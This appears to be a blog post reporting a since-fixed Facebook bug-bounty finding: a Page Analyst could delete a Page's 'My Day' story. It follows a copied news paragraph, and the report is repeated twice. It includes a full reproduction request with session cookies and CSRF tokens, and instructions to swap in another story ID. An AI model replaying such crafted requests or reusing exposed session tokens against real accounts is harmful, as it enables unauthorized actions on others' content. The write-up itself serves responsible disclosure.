Facebook's new 'Messenger Day' feature is a simple social storytelling device that makes it easy to create and share longer form pieces within Messenger. Given the prevalence of such tools now, it makes more sense to label them 'social storytelling' features, as opposed to 'Snapchat clones', but obviously that's where the inspiration comes from - as noted by Instagram chief Kevin Systrom on the launch of Instagram Stories: [Collected from Social Media Today]
They also rolled out the feature for Page.After some test, I saw that My Day of a Page can only be deleted by Page Admin and Editor.All other roles cannot delete MY Day.But this permission is not working properly.I was able to delete My Day of Page having Analyst role.
Steps to reproduce:
When we delete the My Day a request like below is sent:
POST /api/graphqlbatch/ HTTP/1.1
Host: www.facebook.com
Connection: close
Content-Length: 700
Origin: https://web.facebook.com/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://web.facebook.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pl;q=0.8
Cookie: datr=TWv7WRYNUZZUhAOZHB4ATXfJ; sb=TWv7WSiQ24I8FS-0XKqokiJi; dpr=2; locale=en_US; c_user=100007098091153; xs=11%3A95stLh7Ed8WD8A%3A2%3A1513273631%3A2736%3A5291; pl=n; js_ver=2906; fr=0ks7mYyw5WfL0CRxX.AWVInePzrxL8Nnv1KQRn6Ood1D4.BZ-2tL.48.Foy.0.0.BaNUOs.AWX2Er3L; wd=1280x726; presence=EDvF3EtimeF1513443752EuserFA21B07098091145A2EstateFDt3F_5b_5dEutc3F1513443720969G513443752453CEchFDp_5f1B07098091145F13CC; act=1513443771722%2F16
__user=100007098091153&__a=1&__dyn=7AgNe--aFoG649UrJxl0BCwKyaGey8jrWo8ovxGdwIhE98nwgU6C7WUC6UnG2OUuKewhA14DBwJKdx3Gqu58nxWcwJwkEkxa2m4o9Ef8oC-3S7WxR3Ey5ESrwipVk5ElwzwgUhx6WK64326Uao4afwNx-8xuazodopDy8Sez_G48-4o888ErUpUGq9wyQF8mDhA7EqAh49w&__req=28&__be=1&__pc=EXP1:home_page_pkg&__rev=3534449&fb_dtsg=AQHIKa44x8-X:AQGlWZ2DtMXp&jazoest=2658172737597525212056458858658171108879050681167788112&__spin_r=3534449&__spin_b=trunk&__spin_t=1513443694&queries={"o0":{"doc_id":"1340045906066120","query_params":{"input":{"client_mutation_id":"js_173","actor_id":"100007098091153","story_thread_ids":["188273688392089"]}}}}
We need to replace the story thread_ids with the story_thread_ids of Pages My Day.The value of story_thread_ids can be obtained by intercepting call while opening my day.
Video PoC:
Timeline:
Saturday, December 16, 2017 at 3:32pm:Report Sent.
Monday, January 15, 2018 at 11:58pm:Triaged.
Thursday, January 25, 2018 at 10:57pm:Fixed.
Wednesday, January 31,2018 at 5:10pm:$500 Bounty
They also rolled out the feature for Page.After some test, I saw that My Day of a Page can only be deleted by Page Admin and Editor.All other roles cannot delete MY Day.But this permission is not working properly.I was able to delete My Day of Page having Analyst role.
Steps to reproduce:
When we delete the My Day a request like below is sent:
POST /api/graphqlbatch/ HTTP/1.1
Host: www.facebook.com
Connection: close
Content-Length: 700
Origin: https://web.facebook.com/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://web.facebook.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pl;q=0.8
Cookie: datr=TWv7WRYNUZZUhAOZHB4ATXfJ; sb=TWv7WSiQ24I8FS-0XKqokiJi; dpr=2; locale=en_US; c_user=100007098091153; xs=11%3A95stLh7Ed8WD8A%3A2%3A1513273631%3A2736%3A5291; pl=n; js_ver=2906; fr=0ks7mYyw5WfL0CRxX.AWVInePzrxL8Nnv1KQRn6Ood1D4.BZ-2tL.48.Foy.0.0.BaNUOs.AWX2Er3L; wd=1280x726; presence=EDvF3EtimeF1513443752EuserFA21B07098091145A2EstateFDt3F_5b_5dEutc3F1513443720969G513443752453CEchFDp_5f1B07098091145F13CC; act=1513443771722%2F16
__user=100007098091153&__a=1&__dyn=7AgNe--aFoG649UrJxl0BCwKyaGey8jrWo8ovxGdwIhE98nwgU6C7WUC6UnG2OUuKewhA14DBwJKdx3Gqu58nxWcwJwkEkxa2m4o9Ef8oC-3S7WxR3Ey5ESrwipVk5ElwzwgUhx6WK64326Uao4afwNx-8xuazodopDy8Sez_G48-4o888ErUpUGq9wyQF8mDhA7EqAh49w&__req=28&__be=1&__pc=EXP1:home_page_pkg&__rev=3534449&fb_dtsg=AQHIKa44x8-X:AQGlWZ2DtMXp&jazoest=2658172737597525212056458858658171108879050681167788112&__spin_r=3534449&__spin_b=trunk&__spin_t=1513443694&queries={"o0":{"doc_id":"1340045906066120","query_params":{"input":{"client_mutation_id":"js_173","actor_id":"100007098091153","story_thread_ids":["188273688392089"]}}}}
We need to replace the story thread_ids with the story_thread_ids of Pages My Day.The value of story_thread_ids can be obtained by intercepting call while opening my day.
Video PoC:
Timeline:
Saturday, December 16, 2017 at 3:32pm:Report Sent.
Monday, January 15, 2018 at 11:58pm:Triaged.
Thursday, January 25, 2018 at 10:57pm:Fixed.
Wednesday, January 31,2018 at 5:10pm:$500 Bounty
Comments
Post a Comment